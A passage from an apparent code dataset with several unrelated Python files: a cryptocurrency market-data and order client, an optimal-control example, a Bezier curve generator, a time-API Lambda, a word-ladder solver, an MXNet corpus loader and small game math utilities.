sorted(info['exchanges']) for info in msg['pairs']}\n raise RuntimeError(\"could not get marget data config from api-uat.etale.com\")\n\n\nclass Etale(Feed):\n id = ETALE\n 
_pair_exchanges = None\n\n @staticmethod\n def pair_exchanges():\n _pair_exchanges = Etale._pair_exchanges\n if _pair_exchanges is None:\n _pair_exchanges = Etale._pair_exchanges = etale_pair_exchanges(auth)\n return _pair_exchanges\n\n\n def __init__(self, pairs=None, channels=None, callbacks=None, filter=None, track_balances=False, separate_feeds=False, **kwargs):\n '''\n filter = dictionary of iterables\n {\n pair : [exchanges],\n exch : [pairs],\n ... }\n track_balances = True or False [default] to track balances on this feed.\n '''\n super().__init__(wss_url, pairs=pairs, channels=channels, callbacks=callbacks, **kwargs)\n self._ws = None\n if filter is None:\n filter = { pair:['Bitfinex'] for pair, exchs in self._pair_exchanges.items()\n if pair.split('-')[1] in ('CAD', 'GBP', 'EUR', 'JPY', 'KRW', 'USD') }\n self._filter = filter\n self._separate_feeds = separate_feeds\n self._track_balances = track_balances\n if pairs is not None:\n for chan in self.channels:\n self.config[chan] = self.pairs\n self._reset()\n\n def _reset(self):\n if self._ws is not None:\n if self._ws.open:\n self._ws.close()\n self.l2_book = {}\n self.balances = {}\n self.subscriptions = {}\n self.candlesticks = []\n self.consolidateds = []\n self.events = {}\n\n def _filtered_exchanges(self, pair):\n exchanges = self._pair_exchanges[pair]\n if self._filter:\n if pair in self._filter:\n return [exch for exch in exchanges if exch not in self._filter[pair]]\n return [exch for exch in exchanges if pair not in self._filter.get(exch, [])]\n\n async def subscribe(self, ws):\n self._reset()\n self._ws = ws\n await ws.send(auth)\n for pair in set(self.config.get(TRADES, []) + self.config.get(L2_BOOK, [])):\n exchs = self._filtered_exchanges(pair)\n if self._separate_feeds:\n for exch in exchs:\n subscribeId = self.subscriptions.setdefault(('CONSOLIDATED', pair, exch), len(self.consolidateds))\n self.consolidateds.append((pair, [exch]))\n msg = json.dumps({\n \"type\" : \"CONSOLIDATED_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'cmd{subscribeId}',\n \"symbol\" : pair,\n \"exchanges\" : [exch],\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n else:\n subscribeId = self.subscriptions.setdefault(('CONSOLIDATED', pair, ':'.join(exchs)), len(self.consolidateds))\n self.consolidateds.append((pair, exchs))\n msg = json.dumps({\n \"type\" : \"CONSOLIDATED_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'cmd{subscribeId}',\n \"symbol\" : pair,\n \"exchanges\" : exchs,\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n LOG.debug(f\"{self.id} subscribed { len(self.consolidateds) } consolidated feeds\")\n for pair in self.config.get(CANDLES, []):\n for exch in self._filtered_exchanges(pair):\n subscribeId = self.subscriptions.setdefault(('CANDLESTICK', pair, exch), len(self.candlesticks))\n self.candlesticks.append((pair, exch))\n msg = json.dumps({\n \"type\" : \"CANDLESTICK_MARKET_DATA_SUBSCRIBE\",\n \"subscribeId\" : f'bar{subscribeId}',\n \"symbol\" : pair,\n \"exchange\" : exch,\n \"minutes\" : \"1\"\n })\n LOG.debug(f\"{self.id} sending { msg }\")\n await ws.send(msg)\n LOG.info(f\"{self.id} subscribed { len(self.candlesticks) } candlesticks\")\n\n async def message_handler(self, message):\n # msg = json.loads(message, parse_float=Decimal)\n msg = json.loads(message)\n msg['recv'] = datetime.now(tz=UTC)\n LOG.debug(msg)\n msg_type = msg['type']\n if msg_type == 'BALANCE_INFO':\n if self._track_balances:\n await self._process_balances(msg)\n elif msg_type == 'info':\n LOG.info(f'{ 
self.id } { msg }')\n elif msg_type == 'MARKET_DATA_CONFIG':\n Etale._pair_exchanges = {info['pair'] : sorted(info['exchanges']) for info in msg['pairs']}\n elif msg_type == 'CONSOLIDATED_MARKET_DATA':\n await self._process_book(msg)\n elif msg_type == 'TRADE_DATA':\n await self._process_trade(msg)\n elif msg_type == 'CANDLESTICK_MARKET_DATA':\n await self._process_candlestick(msg)\n elif msg_type == 'ACCOUNT_UPDATE_MESSAGE':\n await self._process_account_update(msg)\n else:\n LOG.warning(f'{ self.id } unhandled message type { msg_type } : { msg }')\n\n async def _process_book(self, msg):\n '''\n {\n 'type': 'CONSOLIDATED_MARKET_DATA',\n 'subscribeId': 'cmd1',\n 'mcp': 0.035675,\n 'bids': [\n {'fee': 0.0042305161274415, 'exchange': 'CoinbasePro', 'price': 0.03567, 'qty': 39.53383915},\n {'fee': 6.42233034e-05, 'exchange': 'CoinbasePro', 'price': 0.03566, 'qty': 0.60033},\n ...,],\n 'asks': [\n {'fee': 0.0008992817017776002, 'exchange': 'CoinbasePro', 'price': 0.03568, 'qty': 8.40136119},\n {'fee': 0.00075516471, 'exchange': 'CoinbasePro', 'price': 0.03569, 'qty': 7.053},\n ...,],\n }'''\n pair, exchs = self.consolidateds[int(msg['subscribeId'][3:])]\n self.l2_book[pair] = { exch: { BID : sd(), ASK : sd() } for exch in exchs }\n for level in msg['bids']:\n self.l2_book[pair][level['exchange']][BID][level['price']] = (level['qty'], level['fee'])\n for level in msg['asks']:\n self.l2_book[pair][level['exchange']][ASK][level['price']] = (level['qty'], level['fee'])\n # BID : [(level['price'], level['qty'], level['fee'], level['exchange']) for level in msg['bids']],\n # ASK : [(level['price'], level['qty'], level['fee'], level['exchange']) for level in msg['asks']]}\n for exch in exchs:\n await self.callbacks[L2_BOOK](feed=self.id, pair=pair, exchange=exch, book=self.l2_book[pair][exch], index=msg['recv'], mcp=msg['mcp'])\n\n async def _process_trade(self, msg):\n '''\n {\n \"type\":\"TRADE_DATA\"\n \"subscribeId\":\"cmd1\",\n \"exchange\":\"Gdax\",\n \"symbol\":\"BTC-USD\",\n \"side\":\"BID\",\n \"price\":6483.75,\n \"qty\":0.1016,\n \"timestamp\":1536946514850,\n }'''\n await self.callbacks[TRADES](\n feed = self.id,\n pair = msg['symbol'],\n side = BUY if msg['side'] == ASK else SELL,\n amount = msg['qty'],\n price = msg['price'],\n order_id = None,\n index = msg['recv'],\n timestamp = msg['timestamp']/1000.0,\n exchange = msg['exchange'],\n )\n\n\n async def _process_candlestick(self, msg):\n '''\n {\n \"type\":\"CANDLESTICK_MARKET_DATA\", \"Minutes\":\"1\", \"subscribeId\":\"bar12\", \n \"bidsOHLC\":{\n \"Open\":6394.99,\n \"High\":6394.99,\n \"Low\":6394.99,\n \"Close\":6394.99,\n \"openTimestamp\":1540565259155,\n \"closeTimestamp\":1540565319010,\n \"empty\":false\n },\n \"asksOHLC\":{\n \"Open\":6395.0,\n \"High\":6395.0,\n \"Low\":6395.0,\n \"Close\":6395.0,\n \"openTimestamp\":1540565259155,\n \"closeTimestamp\":1540565319010,\n \"Empty\":false\n },\n \"tradesOHLC\":{\n \"Open\":6395.0,\n \"High\":6395.0,\n \"Low\":6394.99,\n \"Close\":6395.0,\n \"openTimestamp\":1540565259655,\n \"closeTimestamp\":1540565318640,\n \"Empty\":false\n },\n \"tradeVolumes\":{\n \"numeratorVolume\":8.570482639999998,\n \"denominatorVolume\":54808.223822029126,\n \"tradeCount\":36,\n \"Empty\":false\n } \n }'''\n\n (pair, exch) = self.candlesticks[int(msg['subscribeId'][3:])]\n recv = msg['recv']\n # bids = msg['bidsOHLC']\n # if bids['empty']:\n # bids = {'index':recv, 'empty':1}\n # else:\n # bids['index'] = recv\n # bids['empty'] = int(bids['empty'])\n # self.bids_data.append(bids)\n # asks = 
msg['asksOHLC']\n # if asks['empty']:\n # asks = {'index':recv, 'empty':1}\n # else:\n # asks['index'] = recv\n # asks['empty'] = int(asks['empty'])\n # self.asks_data.append(asks)\n trades = msg['tradesOHLC']\n if trades['empty']:\n trades = {'index':recv, 'empty':1}\n else:\n trades['index'] = recv\n trades['empty'] = int(trades['empty'])\n trades['numeratorVolume'] = msg['tradeVolumes']['numeratorVolume']\n trades['denominatorVolume'] = msg['tradeVolumes']['denominatorVolume']\n trades['tradeCount'] = msg['tradeVolumes']['tradeCount']\n\n await self.callbacks[CANDLES](\n feed=self.id,\n exchange=exch,\n pair=pair,\n **trades)\n\n def interrupt(self):\n raise NotImplementedError()\n\n async def get_balances(self):\n msg = {\"type\":\"BALANCE_REQUEST\"}\n evt = self.events.get('balance_request', None)\n if evt is None:\n self.events['balance_request'] = evt = asyncio.Event()\n else:\n evt.clear()\n await self._ws.send(json.dumps(msg))\n await evt.wait()\n return self.balances\n\n def _read_balances(self, msg):\n '''\n {\n 'type': 'BALANCE_INFO', 'recv': datetime.datetime(2019, 2, 28, 15, 6, 59, 502207, tzinfo=)\n 'balances': {\n 'Hitbtc': [\n {'currency': {'name': 'BTC'}, 'amount': 50.0},\n {'currency': {'name': 'USDT'}, 'amount': 100000.0} ],\n 'Binance': [\n {'currency': {'name': 'BTC'}, 'amount': 50.0},\n {'currency': {'name': 'USDT'}, 'amount': 100000.0} ],\n 'Blockchain': [],\n ...},\n }'''\n all_exchanges = 0\n new_exchanges = 0\n all_amounts = 0\n new_amounts = 0\n chg_amounts = 0\n data = msg['balances']\n for exch, info in data.items():\n exch_balances = self.balances.get(exch)\n all_exchanges += 1\n if exch_balances is None:\n self.balances[exch] = dict((item['currency']['name'], item['amount'])\n for item in info)\n new_exchanges += 1\n else:\n for item in info:\n cur = item['currency']['name']\n amt = exch_balances.get(cur)\n if amt is None:\n LOG.info(f\"Got balance for {cur}: {amt}\")\n new_amounts += 1\n elif amt != item['amount']:\n LOG.info(f\"Got new balance for {cur}: {amt} -> {item['amount']}\")\n chg_amounts += 1\n exch_balances[cur] = item['amount']\n all_amounts += 1\n self.balances['last_update'] = time()\n self.balances['last_update_stats'] = {\n 'all_exchanges':all_exchanges,\n 'new_exchanges':new_exchanges,\n 'all_amounts':all_amounts,\n 'new_amounts':new_amounts,\n 'chg_amounts':chg_amounts,\n }\n LOG.info(f'{self.id } { msg }')\n LOG.info(f'read balances for {all_exchanges} ({new_exchanges} new); {all_amounts} ccys ({new_amounts} new, {chg_amounts} chg)')\n evt = self.events.get('balance_request', None)\n if evt is not None:\n evt.set()\n\n async def _process_balances(self, msg):\n self._read_balances(msg)\n # insert async callbacks for reading balances\n\n async def _process_account_update(self, msg):\n '''\n {\n 'type': 'ACCOUNT_UPDATE_MESSAGE',\n 'recv': datetime.datetime(2019, 2, 28, 15, 10, 59, 513023, tzinfo=),\n 'updates': [\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'BTC',\n 'qty': 200.0,\n 'realizedPnl': 0.0,\n 'unrealizedPnl': -35286.39999999996,\n 'dollarValue': 764713.6000000001\n },\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'USD',\n 'qty': 200000.0,\n 'realizedPnl': 0.0,\n 'unrealizedPnl': 0.0,\n 'dollarValue': 200000.0\n },\n {\n 'pathToAccount': ['ROOT', 'DEFAULT_ACC'],\n 'currency': 'USDT', 'qty': 200000.0, 'realizedPnl': 0.0, 'unrealizedPnl': 0.0, 'dollarValue': 200000.0}\n ],\n }'''\n LOG.info(msg)\n pass\n\n\n async def send_order(self, side, pair, limitPrice, quantity, exchanges,\n 
useFeeAdjustment=\"false\", routingAlgo=\"DMA\", timeInForce=\"GTC\",\n stableCoins=[ {\"stableCoin\":\"TUSD\",\"discountFactor\":0.99},\n {\"stableCoin\":\"USDC\",\"discountFactor\":0.99},\n {\"stableCoin\":\"USDT\",\"discountFactor\":0.99} ]):\n '''\n {\n \"type\":\"ORDER\",\n \"clOrdId\":, \"side\":\"SELL\",\n \"pair\":\"ETH-USD\",\n \"limitPrice\":407,\n \"quantity\":1, \"exchanges\":[\"Gemini\"], \"useFeeAdjustment\": false, \"routingAlgo\":\"CERA\",\n \"timeInForce\": \"GTC\",\n \"stableCoins\": [\n {\"stableCoin\":\"TUSD\",\"discountFactor\":1},\n {\"stableCoin\":\"USDT\",\"discountFactor\":1} ]\n }'''\n clOrdId = -1\n msg = json.dumps({\n \"type\" : \"ORDER\",\n \"clOrdId\": clOrdId,\n \"side\" : side,\n \"pair\" : pair,\n \"limitPrice\" : limitPrice,\n \"quantity\" : quantity,\n \"exchanges\" : exchanges,\n \"useFeeAdjustment\" : useFeeAdjustment,\n \"routingAlgo\" : routingAlgo,\n \"timeInForce\" : timeInForce,\n \"stableCoins\" : stableCoins\n })\n log.INFO(f'{ self.id } sending { msg }')\n raise NotImplementedError()\n await self._ws.send(msg)\n\n async def send_wap_order(self, side, pair, limitPrice, quantity, exchanges, startTime, endTime,\n participationRate, useFeeAdjustment=\"false\", routingAlgo=\"TWAP\"):\n '''\n {\n \"type\":\"WAP_ORDER\",\n \"clOrdId\":,\n \"side\":\"SELL\",\n \"pair\":\"ETH-USD\",\n \"limitPrice\":407,\n \"quantity\":1,\n \"exchanges\":[\"Gemini\", \"Gdax\"],\n \"useFeeAdjustment\": false,\n \"routingAlgo\":\"TWAP\"\n \"startTime\":\"2018-08-03 17:01 GMT+04:00\",\n \"endTime\":\"2018-08-03 17:19 GMT+04:00\",\n \"participationRate\": 0.4\n }'''\n raise NotImplementedError()\n await self._ws.send(msg)\n\n# For the PEG and LUCY order types the order message has the following format:\n# {\n# \"type\":\"PEG_ORDER\", \"routingAlgo\":\"PEG\",\n# \"clOrdId\":, \"side\":\"SELL\",\n# \"pair\":\"ETH-USD\",\n# \"limitPrice\":407,\n# \"quantity\":1,\n# \"exchanges\":[\"Gemini\", \"CoinbasePro\"], \"orderPlacementExchange\":\"CoinbasePro\", \"referencePriceType\":\"PRIMARY\", \"priceOffset\":0.01,\n# \"tolerance\":0.05, \"useFeeAdjustment\": false }\n# The fields definitions are as follows:\n# clOrdId\n# Unique ID assigned by the user to identify this order.\n# side\n# BUY or SELL\n# routingAlgo\n# DMA, TWAP, SOR, CERA, PEG, LUCY, or PARTICIPATION\n# pair\n# The symbol being traded.\n# limitPrice\n# The limit price for the order. Only valid for DMA, SOR, CERA, and Participation Rate orders.\n# quantity\n# The quantity to trade\n# timeInForce\n# GTC or IOC. Only used by DMA orders.\n# exchanges\n# The list of exchanges to which this order may be routed. Note: for DMA orders this must be a single exchange. Also, for Portfolio TWAP orders, this must be a single exchange.\n# stableCoins\n# Used for CERA orders. This is a map of stable coin pairs with associated discount factors. The format of the map is:\n# [\n# {\"stableCoin\":\"TUSD\",\"discountFactor\":1} , {\"stableCoin\":\"USDT\",\"discountFactor\":1}\n# ]\n# useFeeAdjustment\n# \"True\" if fees should be considered when making routing decisions, false otherwise. Ignored for DMA orders.\n# startTime\n# The start time of the order. Only valid for TWAP and Participation Rate orders.\n# endTime\n# The end time of the order. Only valid for TWAP and Participation Rate orders.\n# participationRate\n# The fraction of the current volume that the algorithm should maintain. Only valid for Participation Rate orders.\n# orderPlacementExchange\n# The exchange at which to place the peg order. 
Only valid for PEG orders.\n \n# referencePriceType\n# The reference price to peg to.One of PRIMARY (the favorable side of the market), MARKET(the aggressive, or marketable side of the market) or MCP(the market clearing price). Only valid for PEG orders.\n# priceOffset\n# The offset from the reference price to peg the order to. Only valid for PEG orders. Must be 0 or negative for PRIMARY and MCP peg orders. Only valid for PEG orders.\n# tolerance\n# The price drift threshold above which a peg order is cancelled and replaced by a new peg order at an updated price. Only valid for PEG orders.\n# agression\n# Aggressiveness setting for the order. Used for LUCY orders.\n# passiveDurationSecs\n# How long the order should hunt for passive liquidity before turning aggressive. Used for LUCY orders.\n# After an order is placed, Etale will respond with an order acknowledgment message:\n# {\n# \"type\":\"ORDER_ACK\",\n# \"clOrdId\": , \"status\": <\"accepted\", \"rejected\">, \"reason\": \"order status info\"\n# }\n# Order fills are reported with fill messages as child orders complete. The fill message format is as follows:\n# {\n# \"type\":\"ORDER_EXECUTION_REPORT\", \"clOrdId: \"...\", \"originatingOrderClOrdId\" : \"...\", \"orderId: \"...\",\n# \"symbol\": \"ETH-USD\",\n# \"side\": <\"BUY\", \"SELL\"> \"orderQty\": 10,\n# \"filledQty\": 1,\n# \"unfilledQty\": 9,\n# \"price\": 6700,\n# \"status\": <\"active\", \"done\"> \"lastQty\": 1,\n# \"lastPrice\": 6500,\n# \"exchange\": \"Gdax\",\n# \"exchangeId\": \".....\", \"execId\": \".....\", \"reason\": \".....\"\n# }\n# For WAP orders, a separate WAP order update will also be published along with each execution report. It will contain a summary of the status of the order.\n# {\n# \"id\":\"1539805694642\", \"clOrdId\":\"clOrdIdx-1070\", \"wapType\":\"TWAP\", \"percentComplete\":20, \"startMs\":1539806280000, \"endMs\":1539806580000, \"reserveCurrency\":\"\", \"status\":\"ACTIVE\", \"description\":\"...\", \"type\":\"WAP_UPDATE\"\n# }\n# For PEG and LUCY orders, a separate order update will also be published along with each execution report. It will contain a summary of the status of the order.\n# {\n# \"id\":\"1550838031822\", \"clOrdId\":\"1-ID0009939\", \"pegType\":\"PEG\", \"receivedTimeMs\":1550862123215, \"originalQty\":5,\n# \"filledQty\":0, \"status\":\"ACTIVE\", \"numOrdersPlaced\":1, \"description\":\"...\", \"type\":\"PEG_UPDATE\"\n# }\n# To cancel an active order send a cancel message>\n# {\n# \"type\": \"ORDER_CXL\", \"clOrdId\":\"....\"\n# }\n# In response to a cancel request, a cancel response message will be sent:\n# {\n# \"type\":\"ORDER_EXECUTION_REPORT\", \"clOrdId\":, \"status\": \"done\",\n# \"reason\": \"User cancelled\"\n# }\n\n\n# {\n# \"type\":\"ACTIVE_ORDER_REQUEST\"\n# }\n# The response to this message is :\n# { \"type\":\"ACTIVE_ORDERS\", \"orders\": [\n# { \"type\":\"ORDER_STATUS\", \"clOrdId: \"...\", \"orderId: \"...\", \"symbol\": \"ETH-USD\",\n# \"side\": <\"BUY\", \"SELL\"> \"orderQty\": 10,\n# \"filledQty\": 1, \"unfilledQty\": 9,\n# \"price\": 6700,\n# \"status\": <\"active\", \"done\">\n# },... 
]\n# }\n\n# {\n# \"type\": \" BCDM_SUBSCRIBE \", \"subscribeId\": \"BCDM-1\"\n# }\n# To unsubscribe send the following message:\n# {\n# \"type\": \" BCDM_UNSUBSCRIBE \", \"subscribeId\": \"BCDM-1\"\n# }\n# Updates messages are in the following format:\n# {\n# \"subscribeId\":\"BCDM-1\", \"transfers\":[\n# {\n# \"index\":1537219982010, \"date\":\"17/09/18\", \"timestamp\":\"17:52:11\", \"qty\":19.95767434586466, \"coin\":\"ZRX\", \"fromAddress\":\"0x384896375...\", \"toAddress\":\"0x4cd49ef1...\", \"tx\":\"NA\"\n# }, {\n# } ],\n# \"index\":1537219982011, \"date\":\"17/09/18\", \"timestamp\":\"17:52:12\", \"qty\":1.48574446,\n# \"coin\":\"LTC\", \"fromAddress\":\"504ea591e3477c...\", \"toAddress\":\"LN8DXdQWvT3GL...\", \"tx\":\"504ea591e34...\"\n# \"type\":\"BCDM_UPDATE\" }\n\n","sub_path":"cryptofeed/etale/etale.py","file_name":"etale.py","file_ext":"py","file_size_in_byte":22890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106741897","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom Git.OptimalControl.DirectCollocation import dircol\n\n# Double Integrator Example\n# x[0] = position\n# x[1] = velocity\n# u[0] = control effort\n\n\ndef L(x,u):\n return x[0]**2 + x[1]**2\n\ndef phi(x,u):\n return 10*x[0]**2 + 10*x[1]**2\n\ndef f(x,u,d):\n dx = np.empty(shape=(len(x)))\n dx[0] = x[1]\n dx[1] = u[0] + d[0]\n return dx\n\nt = np.arange(0,10,0.5)\ncontroller = dircol(xdim=2, # Dimension of State Vector\n udim=1, # Dimension of Control Vector\n ddim=1, # Dimension of Disturbance Vector\n L=L, # Running Cost\n phi=phi, # Terminal Cost\n f=f, # System Dynamics\n g=[], # Point Inequality Constraints\n h=[], # Point Equality Constraints\n umax = [5], # Control Upper Bound\n umin = [-5], # Control Lower Bound\n xmax=[None,None], # State Upper Bound\n xmin=[None,None], # State Lower Bound\n t = t) # Discrete Time Steps. Shape = (N)\n\n\nx,u = controller.path(x0=[-20,0], # Initial State. Shape = (xdim)\n u_guess = None, # Initial Guess for Control Trajectory. Shape = (N,udim)\n x_guess = None, # Initial Guess for State Trajectory. Shape = (N,xdim)\n d_guess = None, # Initial Guess for Disturbance Trajectory. Shape = (N,ddim)\n maxIter=10, # Max iterations done by scipy's SLSQP Optimizer.\n minCost=0, # Min cost-tolerance in Optimizer before termination\n xN=[None,None]) # Hard Equality-constraint on Terminal State. 
Shape = (xdim)\n\n\n# Plotting discrete solution\nplt.scatter(t,x[:,0],s=15)\nplt.scatter(t,u[:,0],s=15)\n\n# Interpolation into \"Continuous\" Solution\nt = np.arange(0,10,0.01)\nx,u = controller.interpolate(x=x,u=u,d=None,t=t)\nplt.plot(t,u[:,0],label='control')\nplt.plot(t,x[:,0],label='position')\nplt.grid(True)\nplt.legend()\nplt.show()\n\n\n\n\n\n\n","sub_path":"doubleIntegrator.py","file_name":"doubleIntegrator.py","file_ext":"py","file_size_in_byte":2414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"67053696","text":"#!/usr/bin/env python3\nimport sys\nimport math\nfrom decimal import Decimal as D\n#helper function to calculate combination\ndef nCr(n,r):\n return (math.factorial(n) / math.factorial(r) / math.factorial(n-r))\n#helper function to list all number between a and b given step c\ndef frange(a, b, c):\n\twhile a < b:\n\t\tyield round(D(a), 4)\n\t\ta+=c\n#create a class to calculate Bezier curve\nclass BezierCurve:\n\tdef __init__(self, d=0.05, l= [], r= 0.1):\n\t\t#input that specifies the increment u\n\t\tself.d = d\n\t\t#list of input control points\n\t\tself.point_list = l\n\t\t#radius of the curve, only serves purpose in FreeCAD\n\t\tself.radius = r\n\t\t#number of input points\n\t\tself.num_of_points= 0\n\t\t#number of output points\n\t\tself.num_of_output = 0\n\t#function to calculate the Bezier curve, given the input control points and the increment\n\tdef calculate_curve(self):\n\t\tpoint_list =[]\n\t\tfor t in frange(0, 1+ self.d, self.d):\n\t\t\tself.num_of_output +=1\n\t\t\t#separately calculate p for each dimension\n\t\t\tp_x = 0\n\t\t\tp_y = 0\n\t\t\tp_z = 0\n\t\t\tfor i in range(self.num_of_points+1):\n\t\t\t\t#calculate Bezier Curve using the formula\n\t\t\t\tp_x += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][0]\n\t\t\t\tp_y += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][1]\n\t\t\t\tp_z += nCr(self.num_of_points, i) * math.pow(round((1-t), 6), (self.num_of_points-i))* math.pow(t, i) * self.point_list[i][2]\n\t\t\tprint(round(p_x, 6), round(p_y, 6), round(p_z, 6), end= \",\\n\")\n\ndef main():\n\tfilename =\"HW1_test4.txt\"\n\tu = 0.01\n\tr= 0.1\n\t#check for specified arguments, otherwise the program will run with default values\n\tfor i in range(len(sys.argv)):\n\t\tif sys.argv[i] == \"-f\":\n\t\t\tfilename = sys.argv[i+1]\n\t\telif sys.argv[i] == \"-u\":\n\t\t\tu = round(float(sys.argv[i+1]), 4)\n\t\telif sys.argv[i] == \"-r\":\n\t\t\tr = round(float(sys.argv[i+1]), 4)\n\t#initiate the object\n\tbz = BezierCurve(u, [], r)\n\twith open(filename) as file:\n\t\t#record output to fit Open Inventor format\n\t\toutput = \"\"\n\t\t#read input file, record the control points\n\t\tfor line in file:\n\t\t\ts =\"Separator {LightModel {model PHONG}Material {\tdiffuseColor 1.0 1.0 1.0}\\nTransform {translation\\n\"\n\t\t\tpoint=[]\n\t\t\tline = line.split(\"\\n\")[0]\n\t\t\tpoints = line.split(\" \")\n\t\t\tfor p in points:\n\t\t\t\ts+= p + \" \"\n\t\t\t\tp = float(p)\n\t\t\t\tpoint.append(p)\n\t\t\ts+=\"\\n}Sphere {\tradius \" + str(r) + \" }}\\n\"\n\t\t\toutput+=s\n\t\t\t#store all input control points to later calculate the curve\n\t\t\tbz.point_list.append(point)\n\t\t\tbz.num_of_points=len(bz.point_list)-1\n\tprint(\"#Inventor V2.0 ascii\\nSeparator {LightModel {model BASE_COLOR} Material {diffuseColor 1.0 1.0 1.0}\\nCoordinate3 { \tpoint [\")\n\n\t#calculate the 
curve then output to stdout\n\tbz.calculate_curve()\n\tprint(\"] }\")\n\t#record output to fit Open Inventor format\n\tindexes = \"IndexedLineSet {coordIndex [\\n\"\n\tfor i in range(bz.num_of_output):\n\t\tindexes+= str(i) + \", \"\n\tindexes+=\"-1, \\n] } }\"\n\tprint(indexes)\n\tprint(output)\n\t#close the file\n\tfile.close()\nmain()\n","sub_path":"HW1/BezierCurve.py","file_name":"BezierCurve.py","file_ext":"py","file_size_in_byte":3016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"635195477","text":"import sys\nimport requests\n\nERROR = u'error'\nUNIX_TIME = u'unixtime'\n\nAPI_TIMEZONE_ = \"http://worldtimeapi.org/api/timezone/Europe/\"\n\n\ndef get_unix_time(locale):\n url = API_TIMEZONE_ + locale\n \n # HTTP request\n try:\n r = requests.get(url)\n except requests.exceptions.RequestException as e:\n return e\n \n content = r.json()\n \n # Check if the response returned any error\n if (ERROR in content):\n\t return (\"Sorry there was an Error: \", content[u'error'])\n\n # Parse the Unix Time \n unix_time = content[(u'%s' % UNIX_TIME)]\n\n return {\n 'unixtime': unix_time\n }\n\n\ndef lambda_handler(argv, event):\n locale = argv['locale']\n return get_unix_time(locale)\n","sub_path":"lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"56166662","text":"class Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n if endWord not in wordList: return 0\n wordList = set(wordList)\n s1, s2 = set(), set()\n s1.add(beginWord)\n s2.add(endWord)\n step = 1\n while s1 and s2:\n step += 1\n if len(s1) > len(s2):\n s1, s2 = s2, s1\n s = set()\n for word in s1:\n next_words = [word[:i] + c + word[i + 1:] for i in range(len(word)) for c in 'abcdefghijklmnopqrstuvwxyz']\n for mutation in next_words:\n if mutation in s2: return step\n if mutation in wordList:\n wordList.remove(mutation)\n s.add(mutation)\n s1 = s\n return 0","sub_path":"Week_04/leetcode_127.py","file_name":"leetcode_127.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"82429333","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# Usage: \n# Author: wxm71(weixing.mei@aispeech.com)\n\nimport math\nimport logging\nimport mxnet as mx\n\nfrom .utils import tokenize, batchify\nfrom .vocab import Vocab\nfrom .corpusiter import CorpusIter\n\ndef dump_data(data, base):\n fid = open(base, 'w')\n buf = [str(i) for i in data[0:100]]\n fid.write(' '.join(buf))\n fid.close()\n\n\nclass Corpus(object):\n def __init__(self, basedir=None, vocab:Vocab=None):\n self.logger = logging.getLogger(str(self.__class__))\n\n ftrain = '%s/train.txt' % basedir\n fvalid = '%s/valid.txt' % basedir\n ftest = '%s/test.txt' % basedir\n\n update_vocab = vocab is None\n self.data_train, self.vocab = tokenize(ftrain, vocab, update_vocab=update_vocab, eos=True)\n self.data_valid, _ = tokenize(fvalid, self.vocab, eos=True)\n self.data_test, _ = tokenize(ftest, self.vocab, eos=True)\n\n self._test_iter = None\n self._train_iter = None\n self._valid_iter = None\n\n self.wrdfrq = []\n self.total_wrd = 0\n\n self.build_wrdcnt()\n\n\n def build_wrdcnt(self):\n self.total_wrd = 0\n self.wrdfrq = [0.0]*len(self.vocab)\n\n for idx in self.data_train: \n self.wrdfrq[idx] += 1\n self.total_wrd += 1\n\n for idx,cnt in enumerate(self.wrdfrq): 
\n self.wrdfrq[idx] /= self.total_wrd\n\n\n def _get_iter(self, data, batch_size, bptt, num_parall=2):\n return CorpusIter(data, batch_size, bptt, num_parall) \n\n\n def get_train_iter(self, batch_size, bptt, num_parall=2):\n if not self._train_iter:\n self._train_iter = self._get_iter(self.data_train, batch_size, bptt, num_parall) \n return self._train_iter\n\n\n def get_test_iter(self, batch_size, bptt, num_parall=2):\n if not self._test_iter:\n self._test_iter = self._get_iter(self.data_test, batch_size, bptt, num_parall) \n return self._test_iter\n\n\n def get_valid_iter(self, batch_size, bptt, num_parall=2):\n if not self._valid_iter:\n self._valid_iter = self._get_iter(self.data_valid, batch_size, bptt, num_parall) \n return self._valid_iter\n","sub_path":"example/rnn/nce/src/loader/corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"24140413","text":"__author__ = 'Muneer'\n\nimport random, math\n\n\ndef wrap_around(pos, ScreenLengths):\n # check if its out of the screen\n x, y = pos\n if x > ScreenLengths[0] - 1:\n pass\n # check x\n x = x % ScreenLengths[0]\n # check y\n y = y % ScreenLengths[1]\n\n return x, y\n\n\ndef get_random_position(screenlengths):\n return (random.randint(0, screenlengths[0]), random.randint(0, screenlengths[1]))\n\n\ndef rotate_2D(point, angle):\n rad = math.radians(angle)\n rotate = (\n (math.cos(rad), -math.sin(rad)),\n (math.sin(rad), math.cos(rad))\n )\n\n result = (point[0] * rotate[0][0] + point[1] * rotate[1][0],\n point[0] * rotate[0][1] + point[1] * rotate[1][1])\n\n return ((result[0]), (result[1]))\n\ndef lerp(current, target, speed):\n diff = ((target[0] - current[0]) * speed, (target[1] - current[1]) * speed)\n return (current[0] + diff[0], current[1] + 